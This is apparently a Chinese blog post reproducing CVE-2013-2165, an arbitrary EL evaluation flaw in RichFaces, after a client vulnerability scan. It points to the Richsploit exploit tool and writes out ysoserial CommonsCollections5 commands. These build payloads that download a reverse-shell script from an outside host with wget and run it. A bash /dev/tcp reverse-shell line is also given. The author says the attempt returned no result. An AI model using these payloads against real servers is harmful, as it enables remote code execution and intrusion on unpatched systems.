RF-14310: Arbitrary EL Evaluation | Arbitrary EL Evaluation in RichFaces | CVE-2013-2165 復現
阿新 • • 發佈:2020-12-14
緣起
今天給客戶做掃描,掃描器掃到一個漏洞
但這個漏洞是好久之前的,按照大佬的文章去復現,發現官方啥的都不提供下載了,而我自己java比較垃圾,就想著不復現了,直接copy個POC來用就行,但是遇到了一些問題
都是自己菜導致的,算了過程都不說了,直接看結果吧
首先redtimmy
是釋出了利用工具的https://github.com/redtimmy/Richsploit
我們把工具下載下來
然後用IDEA開啟(可以用學生郵箱白嫖一年的使用權)
要匯入這個包要不然用不了????不匯入好像也行
好的我們要執行這個檔案, path這個路徑填的檔名..(下面說哪來的)
path這個路徑填的檔名是用工具生成的,github直接搜尋ysoserial
先用ysoserial生成相關payload java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 "/usr/bin/wget -O /tmp/reverseshell http://x.x.x.x/reverseshell" > payload1.bin java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 "/bin/bash /tmp/reverseshell" > payload2.bin reverseshell裡面可以這樣寫: /bin/bash -c '/bin/bash -i >/dev/tcp/x.x.x.x/xxxx 2>&1'
緣滅
然後執行指令碼生成payload
把payload拼接到/DATA/後面即可
好可惜啊,我這個竟然沒反應,大佬說返回500說明程式碼執行成功了,我怎麼怎麼慘,祝福大家都有好運氣
其他參考連結:
https://vnprogramming.com/index.php/2016/10/10/web500-hitconctf-2016-and-exploit-cve-2013-2165/